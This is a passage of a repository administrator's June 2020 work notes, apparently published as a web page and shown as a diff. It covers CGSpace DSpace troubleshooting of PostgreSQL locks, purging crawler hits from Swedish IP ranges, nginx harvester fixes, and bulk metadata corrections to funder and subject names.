+Jun 07 02:00:27 linode18 tomcat7[6286]:         at sun.reflect.GeneratedMethodAccessor548.invoke(Unknown Source)
+Jun 07 02:00:27 linode18 tomcat7[6286]:         at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+Jun 07 02:00:27 linode18 tomcat7[6286]:         at java.lang.reflect.Method.invoke(Method.java:498)
+Jun 07 02:00:27 linode18 tomcat7[6286]:         at com.sun.jersey.spi.container.JavaMethodInvokerFactory$1.invoke(JavaMethodInvokerFactory.java:60)
+...
+</code></pre><ul>
+<li>And:</li>
+</ul>
+<pre tabindex="0"><code>Jun 08 09:28:29 linode18 tomcat7[6286]: SEVERE: Mapped exception to response: 500 (Internal Server Error)
+Jun 08 09:28:29 linode18 tomcat7[6286]: javax.ws.rs.WebApplicationException
+Jun 08 09:28:29 linode18 tomcat7[6286]:         at org.dspace.rest.Resource.processFinally(Resource.java:169)
+Jun 08 09:28:29 linode18 tomcat7[6286]:         at org.dspace.rest.HandleResource.getObject(HandleResource.java:81)
+Jun 08 09:28:29 linode18 tomcat7[6286]:         at sun.reflect.GeneratedMethodAccessor360.invoke(Unknown Source)
+Jun 08 09:28:29 linode18 tomcat7[6286]:         at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+Jun 08 09:28:29 linode18 tomcat7[6286]:         at java.lang.reflect.Method.invoke(Method.java:498)
+</code></pre><ul>
+<li>And:</li>
+</ul>
+<pre tabindex="0"><code>Jun 06 08:19:54 linode18 tomcat7[6286]: SEVERE: Mapped exception to response: 500 (Internal Server Error)
+Jun 06 08:19:54 linode18 tomcat7[6286]: javax.ws.rs.WebApplicationException
+Jun 06 08:19:54 linode18 tomcat7[6286]:         at org.dspace.rest.Resource.processException(Resource.java:151)
+Jun 06 08:19:54 linode18 tomcat7[6286]:         at org.dspace.rest.CollectionsResource.getCollectionItems(CollectionsResource.java:289)
+Jun 06 08:19:54 linode18 tomcat7[6286]:         at sun.reflect.GeneratedMethodAccessor598.invoke(Unknown Source)
+Jun 06 08:19:54 linode18 tomcat7[6286]:         at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+Jun 06 08:19:54 linode18 tomcat7[6286]:         at java.lang.reflect.Method.invoke(Method.java:498)
+</code></pre><ul>
+<li>Looking back, I see ~800 of these errors since I changed the database configuration last week:</li>
+</ul>
+<pre tabindex="0"><code># journalctl --since=2020-06-04 --until=today -u tomcat7 | grep -c &#39;javax.ws.rs.WebApplicationException&#39;
+795
+</code></pre><ul>
+<li>And only ~280 in the entire month before that&hellip;</li>
+</ul>
+<pre tabindex="0"><code># journalctl --since=2020-05-01 --until=2020-06-04 -u tomcat7 | grep -c &#39;javax.ws.rs.WebApplicationException&#39;
+286
+</code></pre><ul>
+<li>So it seems to be related to the database, perhaps that there are less connections in the pool?
+<ul>
+<li>&hellip; and on that note, working without the JDBC driver and DSpace&rsquo;s built-in connection pool since 2020-06-04 hasn&rsquo;t actually solved anything, the issue with locks and idle in transaction connections is creeping up again!</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2020/06/postgres_connections_ALL-day2.png" alt="PostgreSQL connections day">
+<img src="/cgspace-notes/2020/06/postgres_connections_ALL-week2.png" alt="PostgreSQL connections week"></p>
+<ul>
+<li>It seems to have started today around 10:00 AM&hellip; I need to pore over the logs to see if there is a correlation
+<ul>
+<li>I think there is some kind of attack going on because I see a bunch of requests for sequential Handles from a similar IP range in a datacenter in Sweden where the user <em>does not</em> re-use their DSpace <code>session_id</code></li>
+<li>Looking in the nginx logs I see most (all?) of these requests are using the following user agent:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
+</code></pre><ul>
+<li>Looking at the nginx access logs I see that, other than something that seems like Google Feedburner, all hosts using this user agent are all in Sweden!</li>
+</ul>
+<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.*.gz | grep &#39;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36&#39; | grep -v &#39;/feed&#39; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
+   1624 192.36.136.246
+   1627 192.36.241.95
+   1629 192.165.45.204
+   1636 192.36.119.28
+   1641 192.36.217.7
+   1648 192.121.146.160
+   1648 192.36.23.35
+   1651 192.36.109.94
+   1659 192.36.24.93
+   1665 192.36.154.13
+   1679 192.36.137.125
+   1682 192.176.249.42
+   1682 192.36.166.120
+   1683 192.36.172.86
+   1683 192.36.198.145
+   1689 192.36.226.212
+   1702 192.121.136.49
+   1704 192.36.207.54
+   1740 192.36.121.98
+   1774 192.36.173.93
+</code></pre><ul>
+<li>The earliest I see any of these hosts is 2020-06-05 (three days ago)</li>
+<li>I will purge them from the Solr statistics and add them to abusive IPs ipset in the Ansible deployment scripts</li>
+</ul>
+<pre tabindex="0"><code>$ ./check-spider-ip-hits.sh -f /tmp/ips -s statistics -p
+Purging 1423 hits from 192.36.136.246 in statistics
+Purging 1387 hits from 192.36.241.95 in statistics
+Purging 1398 hits from 192.165.45.204 in statistics
+Purging 1413 hits from 192.36.119.28 in statistics
+Purging 1418 hits from 192.36.217.7 in statistics
+Purging 1418 hits from 192.121.146.160 in statistics
+Purging 1416 hits from 192.36.23.35 in statistics
+Purging 1449 hits from 192.36.109.94 in statistics
+Purging 1440 hits from 192.36.24.93 in statistics
+Purging 1465 hits from 192.36.154.13 in statistics
+Purging 1447 hits from 192.36.137.125 in statistics
+Purging 1453 hits from 192.176.249.42 in statistics
+Purging 1462 hits from 192.36.166.120 in statistics
+Purging 1499 hits from 192.36.172.86 in statistics
+Purging 1457 hits from 192.36.198.145 in statistics
+Purging 1467 hits from 192.36.226.212 in statistics
+Purging 1489 hits from 192.121.136.49 in statistics
+Purging 1478 hits from 192.36.207.54 in statistics
+Purging 1502 hits from 192.36.121.98 in statistics
+Purging 1544 hits from 192.36.173.93 in statistics
+
+Total number of bot hits purged: 29025
+</code></pre><ul>
+<li>Skype with Enrico, Moayad, Jane, Peter, and Abenet to see the latest OpenRXV/AReS developments
+<ul>
+<li>One thing Enrico mentioned to me during the call was that they had issues with Altmetric&rsquo;s user agents, and he said they are apparently using <code>Altmetribot</code> and <code>Postgenomic V2</code></li>
+<li>I looked in our logs and indeed we have those, so I will add them to the nginx rate limit bypass</li>
+<li>I checked the Solr stats and it seems there are only a few thousand in 2016 and a few hundred in other years so I won&rsquo;t bother adding it to the DSpace robot user agents list</li>
+</ul>
+</li>
+<li>Atmire sent an updated pull request for the Font Awesome 5 update for CUA (<a href="https://github.com/ilri/DSpace/pull/445">#445</a>) so I filed feedback on <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=706">their tracker</a></li>
+</ul>
+<h2 id="2020-06-09">2020-06-09</h2>
+<ul>
+<li>I&rsquo;m still thinking about the issue with PostgreSQL &ldquo;idle in transaction&rdquo; and &ldquo;waiting for lock&rdquo; connections
+<ul>
+<li>As far as I can see from the Munin graphs this issue started in late April or early May</li>
+<li>I don&rsquo;t see any PostgreSQL updates around then, though I did update Tomcat to version 7.0.103 in March</li>
+<li>I will try to downgrade Tomcat to 7.0.99, which was the version I was using until early February, before we had seen any issues</li>
+<li>Also, I will use the PostgreSQL JDBC driver version 42.2.9, which is what we were using back then as well</li>
+<li>After deploying Tomcat 7.0.99 I had to restart Tomcat three times before all the Solr statistics cores came up OK</li>
+</ul>
+</li>
+<li>Well look at that, the &ldquo;idle in transaction&rdquo; and locking issues started in April on DSpace Test too&hellip;</li>
+</ul>
+<p><img src="/cgspace-notes/2020/06/postgres_connections_ALL-day2.png" alt="PostgreSQL connections year DSpace Test"></p>
+<h2 id="2020-06-13">2020-06-13</h2>
+<ul>
+<li>Atmire sent some questions about DSpace Test related to our ongoing CUA indexing issue
+<ul>
+<li>I had to clarify a few build steps and directories on the test server</li>
+</ul>
+</li>
+<li>I notice that the PostgreSQL connection issues have not come back since 2020-06-09 when I downgraded Tomcat to 7.0.99&hellip; fingers crossed that it was something related to that!
+<ul>
+<li>On that note I notice that the AReS explorer is still not harvesting CGSpace properly&hellip;</li>
+<li>I looked at the REST API logs on CGSpace (linode18) and saw that the AReS harvester is being denied due to not having a user agent, oops:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>172.104.229.92 - - [13/Jun/2020:02:00:00 +0200] &#34;GET /rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=50&amp;offset=0 HTTP/1.1&#34; 403 260 &#34;-&#34; &#34;-&#34;
+</code></pre><ul>
+<li>I created an nginx map based on the host&rsquo;s IP address that sets a temporary user agent (ua) and then changed the conditional in the REST API location block so that it checks this mapped ua instead of the default one
+<ul>
+<li>That should allow AReS to harvest for now until they update their user agent</li>
+<li>I restarted the AReS server&rsquo;s docker containers with <code>docker-compose down</code> and <code>docker-compose up -d</code> and the next day I saw CGSpace was in AReS again finally</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-06-14">2020-06-14</h2>
+<ul>
+<li>Abenet asked for a list of authors from CIP&rsquo;s community so that Gabriela can make some corrections
+<ul>
+<li>I generated a list of collections in CIPs two communities using the REST API:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ curl -s &#39;https://cgspace.cgiar.org/rest/handle/10568/51671?expand=collections&#39; &#39;https://cgspace.cgiar.org/rest/handle/10568/89346?expand=collections&#39; | grep -oE &#39;10568/[0-9]+&#39; | sort | uniq &gt; /tmp/cip-collections.txt
+</code></pre><ul>
+<li>Then I formatted it into a SQL query and exported a CSV:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value AS author, COUNT(*) FROM metadatavalue WHERE metadata_field_id = (SELECT metadata_field_id FROM metadatafieldregistry WHERE element = &#39;contributor&#39; AND qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (SELECT item_id FROM collection2item WHERE collection_id IN (SELECT resource_id FROM hANDle WHERE hANDle IN (&#39;10568/100533&#39;, &#39;10568/100653&#39;, &#39;10568/101955&#39;, &#39;10568/106580&#39;, &#39;10568/108469&#39;, &#39;10568/51671&#39;, &#39;10568/53085&#39;, &#39;10568/53086&#39;, &#39;10568/53087&#39;, &#39;10568/53088&#39;, &#39;10568/53089&#39;, &#39;10568/53090&#39;, &#39;10568/53091&#39;, &#39;10568/53092&#39;, &#39;10568/53093&#39;, &#39;10568/53094&#39;, &#39;10568/64874&#39;, &#39;10568/69069&#39;, &#39;10568/70150&#39;, &#39;10568/88229&#39;, &#39;10568/89346&#39;, &#39;10568/89347&#39;, &#39;10568/99301&#39;, &#39;10568/99302&#39;, &#39;10568/99303&#39;, &#39;10568/99304&#39;, &#39;10568/99428&#39;))) GROUP BY text_value ORDER BY count DESC) TO /tmp/cip-authors.csv WITH CSV;
+COPY 3917
+</code></pre><h2 id="2020-06-15">2020-06-15</h2>
+<ul>
+<li>Macaroni Bros emailed me to say that they are having issues with thumbnail links on the REST API
+<ul>
+<li>For some reason all the bitstream <code>retrieveLink</code> links are wrong because they use <code>/bitstreams/</code> instead of <code>/rest/bitstreams/</code>, which leads to an HTTP 404</li>
+<li>I looked on DSpace Test, which is running DSpace 6 dev branch right now, and the links are OK there!</li>
+<li>Looks like someone <a href="https://jira.lyrasis.org/browse/DS-3193">reported this issue on DSpace 6</a></li>
+<li>Other large DSpace 5 sites have this same issue: <a href="https://openknowledge.worldbank.org/handle/10986/30568">https://openknowledge.worldbank.org/handle/10986/30568</a></li>
+<li>I can&rsquo;t believe nobody ever noticed this before&hellip;</li>
+<li>I tried to port the patch from DS-3193 to DSpace 5.x and it builds, but causes an HTTP 500 Internal Server error when generating bitstream links</li>
+<li>Well the correct URL should have <code>/rest/</code> anyways, and that&rsquo;s how the URLs are in DSpace 6 anyways, so I will tell Macaroni to just make sure that those links use <code>/rest/</code></li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-06-16">2020-06-16</h2>
+<ul>
+<li>Looks like the PostgreSQL connection/lock issue might be fixed because it&rsquo;s been six days with no reoccurrence:</li>
+</ul>
+<p><img src="/cgspace-notes/2020/06/postgres_connections_ALL-week3.png" alt="PostgreSQL connections week"></p>
+<ul>
+<li>And CGSpace is being harvested successfully by AReS every day still</li>
+<li>Fix some CIP subjects that had two different styles of dashes, causing them to show up differently in Discovery
+<ul>
+<li><code>SWEETPOTATO AGRI‐FOOD SYSTEMS</code> → <code>SWEETPOTATO AGRI-FOOD SYSTEMS</code></li>
+<li><code>POTATO AGRI‐FOOD SYSTEMS</code> → <code>POTATO AGRI-FOOD SYSTEMS</code></li>
+</ul>
+</li>
+<li>They also asked me to update <code>INCLUSIVE VALUE CHAINS</code> to <code>INCLUSIVE GROWTH</code>, both in the existing items on CGSpace and the submission form</li>
+</ul>
+<h2 id="2020-06-18">2020-06-18</h2>
+<ul>
+<li>I guess Atmire fixed the CUA download issue after updating the version for Font Awesome 5, but now I get an error during ant update
+<ul>
+<li>I tried to remove the <code>config/spring</code> directory, but it still fails</li>
+<li>The same issue happens on my local environment and on the DSpace Test server</li>
+<li>I raised the issue with Atmire</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-06-21">2020-06-21</h2>
+<ul>
+<li>The PostgreSQL connections and locks still look OK on both CGSpace (linode18) and DSpace Test (linode26) after ten days or so
+<ul>
+<li>I decided to upgrade the JDBC driver on DSpace Test from 42.2.9 to 42.2.14 to leave it for a few weeks and see if the issue comes back, as it was present on the test server with DSpace 6 as well</li>
+<li>As far as I can tell the issue is related to something in Tomcat &gt; 7.0.99</li>
+</ul>
+</li>
+<li>Run system updates and reboot DSpace Test</li>
+<li>Re-deploy <code>5_x-prod</code> branch on CGSpace, run system updates, and reboot the server
+<ul>
+<li>I had to restart Tomcat 7 once after the server came back up because some of the Solr statistics cores didn&rsquo;t come up the first time</li>
+<li>Unfortunately I realized that I had forgotten to update the <code>5_x-prod</code> branch to include the REST API fix from last week so I had to rebuild and restart Tomcat again</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-06-22">2020-06-22</h2>
+<ul>
+<li>Skype with Peter, Abenet, Enrico, Jane, and Moayad about the latest OpenRXV developments
+<ul>
+<li>I will go visit CodeObia later this week to run through the list of issues and close the ones that are finished</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-06-23">2020-06-23</h2>
+<ul>
+<li>Peter said he&rsquo;s having problems submitting an item on CGSpace and shit, it seems to be the same fucking PostgreSQL &ldquo;idle in transaction&rdquo; and &ldquo;waiting for lock&rdquo; issue we&rsquo;ve been having sporadically the last few months</li>
+</ul>
+<p><img src="/cgspace-notes/2020/06/postgres_connections_ALL-day3.png" alt="PostgreSQL connections year CGSpace"></p>
+<ul>
+<li>The issue hadn&rsquo;t occurred in almost two weeks after I downgraded Tomcat to 7.0.99 with the PostgreSQL JDBC driver version 42.2.9 so I thought it was fixed
+<ul>
+<li>Apparently it&rsquo;s not related to the Tomcat or JDBC driver version, as even when I reverted back to DSpace&rsquo;s really old built-in JDBC driver it still did the same thing!</li>
+<li>Could it be a memory leak or something? Why now?</li>
+<li>For now I will revert to the latest Tomcat 7.0.104 and PostgreSQL JDBC 42.2.14</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-06-24">2020-06-24</h2>
+<ul>
+<li>Spend some time with Moayad looking over issues for OpenRXV
+<ul>
+<li>We updated all the labels, tooltips, and filters</li>
+<li>The next step is to go through the GitHub issues and close them if they are done</li>
+</ul>
+</li>
+<li>I also discussed the <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a> with Mohammed Salem
+<ul>
+<li>He made some new features to add the harvesting of twelve months of item statistics</li>
+<li>We talked about extending it to be &ldquo;x&rdquo; amount of months and years with some sensible defaults</li>
+<li>The item and items endpoints could then have <code>?months=12</code> and <code>?years=2</code> to show stats for the past &ldquo;x&rdquo; months or years</li>
+<li>We thought other arbitrary date ranges could be added with queries like <code>?date_from=2020-05</code> etc that would query Solr on the fly and obviously be slower&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-06-28">2020-06-28</h2>
+<ul>
+<li>Email GRID.ac to ask them about where old names for institutes are stores, as I see them in the &ldquo;Disambiguate&rdquo; search function online, but not in the standalone data
+<ul>
+<li>For example, both &ldquo;International Laboratory for Research on Animal Diseases&rdquo; (ILRAD) and &ldquo;International Livestock Centre for Africa&rdquo; (ILCA) correctly return a hit for &ldquo;International Livestock Research Institute&rdquo;, but it&rsquo;s nowhere in the data</li>
+</ul>
+</li>
+<li>I discovered two interesting OpenRefine reconciliation services:
+<ul>
+<li><a href="https://github.com/ror-community/ror-reconciler">OpenRefine reconciler for the Research Organization Registry</a></li>
+<li><a href="https://www.getty.edu/research/tools/vocabularies/obtain/openrefine.html">Getty Vocabularies OpenRefine Reconciliation</a> (see the Getty Thesaurus of Geographic Names ® (TGN))</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-06-29">2020-06-29</h2>
+<ul>
+<li>I stumbled upon a sort of <a href="https://rightsstatements.org/page/1.0/">standard for rights statements</a> that we might want to use for <code>dc.rights</code> eventually</li>
+<li>I&rsquo;m trying to understand the difference between <code>dcterms.coverage</code>, <code>dcterms.spatial</code>, and <code>dcterms.temporal</code>
+<ul>
+<li>According to the <a href="https://www.dublincore.org/specifications/dublin-core/dcmi-terms/terms/coverage/">Dublin Core specification for coverage</a> the more specific spatial and temporal subproperties:</li>
+</ul>
+</li>
+</ul>
+<blockquote>
+<p>Because coverage is so broadly defined, it is preferable to use the more specific subproperties Temporal Coverage and Spatial Coverage.</p>
+</blockquote>
+<ul>
+<li>So I guess we should be using this for countries&hellip; but then all regions, countries, etc get merged together into this when you use DCTERMS
+<ul>
+<li>Perhaps better to use <code>cg.coverage.country</code> and crosswalk to <code>dcterms.spatial</code></li>
+<li>Another thing is that these values are not literals—you are supposed to embed classes&hellip;</li>
+</ul>
+</li>
+<li>I also notice that there is a <a href="https://www.crossref.org/services/funder-registry/">CrossRef funders registry</a> with 23,000+ funders that you can <a href="https://gitlab.com/crossref/open_funder_registry">download as RDF</a> or <a href="https://www.crossref.org/education/funder-registry/accessing-the-funder-registry/">access via an API</a></li>
+</ul>
+<pre tabindex="0"><code>$ http &#39;https://api.crossref.org/funders?query=Bill+and+Melinda+Gates&amp;mailto=a.orth@cgiar.org&#39;
+</code></pre><ul>
+<li>Searching for &ldquo;Bill and Melinda Gates&rdquo; we can see the <code>name</code> literal and a list of <code>alt-names</code> literals
+<ul>
+<li>This could be good for checking our funders</li>
+<li>The API currently returns pages for each funder in the vocabulary, but they are giving HTTP 404 right now: <a href="https://data.crossref.org/fundingdata/vocabulary/Label-599174">https://data.crossref.org/fundingdata/vocabulary/Label-599174</a></li>
+<li>I sent an email to the CrossRef Funders Registry team</li>
+</ul>
+</li>
+<li>See the <a href="https://github.com/CrossRef/rest-api-doc">CrossRef API docs</a> (specifically the parameters and filters)</li>
+<li>I made a pull request on CG Core v2 to recommend using persistent identifiers for DOIs and ORCID iDs (<a href="https://github.com/AgriculturalSemantics/cg-core/pull/26">#26</a>)</li>
+<li>I exported sponsors/funders from CGSpace and wrote a script to query the CrossRef API for matches:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=29) TO /tmp/2020-06-29-sponsors.csv;
+COPY 682
+</code></pre><ul>
+<li>The script is <code>crossref-funders-lookup.py</code> and it is based on <code>agrovoc-lookup.py</code>
+<ul>
+<li>On that note, I realized I need to URL encode the funder before making the search request with requests because, while the requests library <em>does</em> do URL encoding, it seems that it interprets characters like <code>&amp;</code> as indicative query parameters and this causes searches for funders like <code>Bill &amp; Melinda Gates Foundation</code> to get misinterpreted</li>
+<li>So then I noticed that I had worked around this in <code>agrovoc-lookup.py</code> a few years ago by just ignoring subjects with special characters like apostrophes and accents!</li>
+</ul>
+</li>
+<li>I tested the script on our funders:</li>
+</ul>
+<pre tabindex="0"><code>$ ./crossref-funders-lookup.py -i /tmp/2020-06-29-sponsors.csv -om /tmp/sponsors-matched.txt -or /tmp/sponsors-rejected.txt -d -e blah@blah.com
+$ wc -l /tmp/2020-06-29-sponsors.csv 
+682 /tmp/2020-06-29-sponsors.csv
+$ wc -l /tmp/sponsors-*
+  180 /tmp/sponsors-matched.txt
+  502 /tmp/sponsors-rejected.txt
+  682 total
+</code></pre><ul>
+<li>It seems that 35% of our funders already match&hellip; I bet a few more will match if I check for simple errors
+<ul>
+<li>Interesting, I found a few funders that we have correct, but can&rsquo;t figure out how to match them in the API:
+<ul>
+<li><code>Claussen-Simon-Stiftung</code></li>
+<li><code>H2020 Marie Skłodowska-Curie Actions</code></li>
+</ul>
+</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-06-30">2020-06-30</h2>
+<ul>
+<li>GRID responded to my question about historical names
+<ul>
+<li>They said the information is not part of the public GRID or ROR lists, but you can access it with a license to the Dimensions API</li>
+</ul>
+</li>
+<li>Gabriela from CIP sent me a list of erroneously added CIP subjects to remove from CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ cat /tmp/2020-06-30-remove-cip-subjects.csv 
+cg.subject.cip
+INTEGRATED PEST MANAGEMENT
+ORANGE FLESH SWEET POTATOES
+AEROPONICS
+FOOD SUPPLY
+SASHA
+SPHI
+INSECT LIFE CYCLE MODELLING
+SUSTAIN
+AGRICULTURAL INNOVATIONS
+NATIVE VARIETIES
+PHYTOPHTHORA INFESTANS
+$ ./delete-metadata-values.py -i /tmp/2020-06-30-remove-cip-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.subject.cip -m 127 -d
+</code></pre><ul>
+<li>She also wants to change their <code>SWEET POTATOES</code> term to <code>SWEETPOTATOES</code>, both in the CIP subject list and existing items so I updated those too:</li>
+</ul>
+<pre tabindex="0"><code>$ cat /tmp/2020-06-30-fix-cip-subjects.csv 
+cg.subject.cip,correct
+SWEET POTATOES,SWEETPOTATOES
+$ ./fix-metadata-values.py -i /tmp/2020-06-30-fix-cip-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.subject.cip -t correct -m 127 -d
+</code></pre><ul>
+<li>She also finished doing all the corrections to authors that I had sent her last week, but many of the changes are removing Spanish accents from authors names so I asked if she&rsquo;s really should she wants to do that</li>
+<li>I ran the fixes and deletes on CGSpace, but not on DSpace Test yet because those scripts need updating for DSpace 6 UUIDs</li>
+<li>I spent about two hours manually checking our sponsors that were rejected from CrossRef and found about fifty-five corrections that I ran on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ cat 2020-06-29-fix-sponsors.csv
+dc.description.sponsorship,correct
+&#34;Conselho Nacional de Desenvolvimento Científico e Tecnológico, Brazil&#34;,&#34;Conselho Nacional de Desenvolvimento Científico e Tecnológico&#34;
+&#34;Claussen Simon Stiftung&#34;,&#34;Claussen-Simon-Stiftung&#34;
+&#34;Fonds pour la formation á la Recherche dans l&#39;Industrie et dans l&#39;Agriculture, Belgium&#34;,&#34;Fonds pour la Formation à la Recherche dans l’Industrie et dans l’Agriculture&#34;
+&#34;Fundação de Amparo à Pesquisa do Estado de São Paulo, Brazil&#34;,&#34;Fundação de Amparo à Pesquisa do Estado de São Paulo&#34;
+&#34;Schlumberger Foundation Faculty for the Future&#34;,&#34;Schlumberger Foundation&#34;
+&#34;Wildlife Conservation Society, United States&#34;,&#34;Wildlife Conservation Society&#34;
+&#34;Portuguese Foundation for Science and Technology&#34;,&#34;Portuguese Science and Technology Foundation&#34;
+&#34;Wageningen University and Research&#34;,&#34;Wageningen University and Research Centre&#34;
+&#34;Leverhulme Centre for Integrative Research in Agriculture and Health&#34;,&#34;Leverhulme Centre for Integrative Research on Agriculture and Health&#34;
+&#34;Natural Science and Engineering Research Council of Canada&#34;,&#34;Natural Sciences and Engineering Research Council of Canada&#34;
+&#34;Biotechnology and Biological Sciences Research Council, United Kingdom&#34;,&#34;Biotechnology and Biological Sciences Research Council&#34;
+&#34;Home Grown Ceraels Authority United Kingdom&#34;,&#34;Home-Grown Cereals Authority&#34;
+&#34;Fiat Panis Foundation&#34;,&#34;Foundation fiat panis&#34;
+&#34;Defence Science and Technology Laboratory, United Kingdom&#34;,&#34;Defence Science and Technology Laboratory&#34;
+&#34;African Development Bank&#34;,&#34;African Development Bank Group&#34;
+&#34;Ministry of Health, Labour, and Welfare, Japan&#34;,&#34;Ministry of Health, Labour and Welfare&#34;
+&#34;World Academy of Sciences&#34;,&#34;The World Academy of Sciences&#34;
+&#34;Agricultural Research Council, South Africa&#34;,&#34;Agricultural Research Council&#34;
+&#34;Department of Homeland Security, USA&#34;,&#34;U.S. Department of Homeland Security&#34;
+&#34;Quadram Institute&#34;,&#34;Quadram Institute Bioscience&#34;
+&#34;Google.org&#34;,&#34;Google&#34;
+&#34;Department for Environment, Food and Rural Affairs, United Kingdom&#34;,&#34;Department for Environment, Food and Rural Affairs, UK Government&#34;
+&#34;National Commission for Science, Technology and Innovation, Kenya&#34;,&#34;National Commission for Science, Technology and Innovation&#34;
+&#34;Hainan Province Natural Science Foundation of China&#34;,&#34;Natural Science Foundation of Hainan Province&#34;
+&#34;German Society for International Cooperation (GIZ)&#34;,&#34;GIZ&#34;
+&#34;German Federal Ministry of Food and Agriculture&#34;,&#34;Federal Ministry of Food and Agriculture&#34;
+&#34;State Key Laboratory of Environmental Geochemistry, China&#34;,&#34;State Key Laboratory of Environmental Geochemistry&#34;
+&#34;QUT student scholarship&#34;,&#34;Queensland University of Technology&#34;
+&#34;Australia Centre for International Agricultural Research&#34;,&#34;Australian Centre for International Agricultural Research&#34;
+&#34;Belgian Science Policy&#34;,&#34;Belgian Federal Science Policy Office&#34;
+&#34;U.S. Department of Agriculture USDA&#34;,&#34;U.S. Department of Agriculture&#34;
+&#34;U.S.. Department of Agriculture (USDA)&#34;,&#34;U.S. Department of Agriculture&#34;
+&#34;Fundação de Amparo à Pesquisa do Estado de São Paulo ( FAPESP)&#34;,&#34;Fundação de Amparo à Pesquisa do Estado de São Paulo&#34;
+&#34;Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul, Brazil&#34;,&#34;Fundação de Amparo à Pesquisa do Estado do Rio Grande do Sul&#34;
+&#34;Fundação de Amparo à Pesquisa do Estado do Rio de Janeiro, Brazil&#34;,&#34;Fundação Carlos Chagas Filho de Amparo à Pesquisa do Estado do Rio de Janeiro&#34;
+&#34;Swedish University of Agricultural Sciences (SLU)&#34;,&#34;Swedish University of Agricultural Sciences&#34;
+&#34;U.S. Department of Agriculture (USDA)&#34;,&#34;U.S. Department of Agriculture&#34;
+&#34;Swedish International Development Cooperation Agency (Sida)&#34;,&#34;Sida&#34;
+&#34;Swedish International Development Agency&#34;,&#34;Sida&#34;
+&#34;Federal Ministry for Economic Cooperation and Development, Germany&#34;,&#34;Federal Ministry for Economic Cooperation and Development&#34;
+&#34;Natural Environment Research Council, United Kingdom&#34;,&#34;Natural Environment Research Council&#34;
+&#34;Economic and Social Research Council, United Kingdom&#34;,&#34;Economic and Social Research Council&#34;
+&#34;Medical Research Council, United Kingdom&#34;,&#34;Medical Research Council&#34;
+&#34;Federal Ministry for Education and Research, Germany&#34;,&#34;Federal Ministry for Education, Science, Research and Technology&#34;
+&#34;UK Government’s Department for International Development&#34;,&#34;Department for International Development, UK Government&#34;
+&#34;Department for International Development, United Kingdom&#34;,&#34;Department for International Development, UK Government&#34;
+&#34;United Nations Children&#39;s Fund&#34;,&#34;United Nations Children&#39;s Emergency Fund&#34;
+&#34;Swedish Research Council for Environment, Agricultural Science and Spatial Planning&#34;,&#34;Swedish Research Council for Environment, Agricultural Sciences and Spatial Planning&#34;
+&#34;Agence Nationale de la Recherche, France&#34;,&#34;French National Research Agency&#34;
+&#34;Fondation pour la recherche sur la biodiversité&#34;,&#34;Foundation for Research on Biodiversity&#34;
+&#34;Programa Nacional de Innovacion Agraria, Peru&#34;,&#34;Programa Nacional de Innovación Agraria, Peru&#34;
+&#34;United States Agency for International Development (USAID)&#34;,&#34;United States Agency for International Development&#34;
+&#34;West Africa Agricultural Productivity Programme&#34;,&#34;West Africa Agricultural Productivity Program&#34;
+&#34;West African Agricultural Productivity Project&#34;,&#34;West Africa Agricultural Productivity Program&#34;
+&#34;Rural Development Administration, Republic of Korea&#34;,&#34;Rural Development Administration&#34;
+&#34;UK’s Biotechnology and Biological Sciences Research Council (BBSRC)&#34;,&#34;Biotechnology and Biological Sciences Research Council&#34;
+$ ./fix-metadata-values.py -i /tmp/2020-06-29-fix-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -t correct -m 29
+</code></pre><ul>
+<li>Then I started a full re-index at batch CPU priority:</li>
+</ul>
+<pre tabindex="0"><code>$ time chrt --batch 0 dspace index-discovery -b
+
+real    99m16.230s
+user    11m23.245s
+sys     2m56.635s
+</code></pre><ul>
+<li>Peter wants me to add &ldquo;CORONAVIRUS DISEASE&rdquo; to all ILRI items that have ILRI subject &ldquo;COVID19&rdquo;
+<ul>
+<li>I exported the ILRI community and cut the columns I needed, then opened the file in OpenRefine:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Xmx512m -Dfile.encoding=UTF-8&#34;
+$ dspace metadata-export -i 10568/1 -f /tmp/ilri.cs
+$ csvcut -c &#39;id,cg.subject.ilri[],cg.subject.ilri[en_US],dc.subject[en_US]&#39; /tmp/ilri.csv &gt; /tmp/ilri-covid19.csv
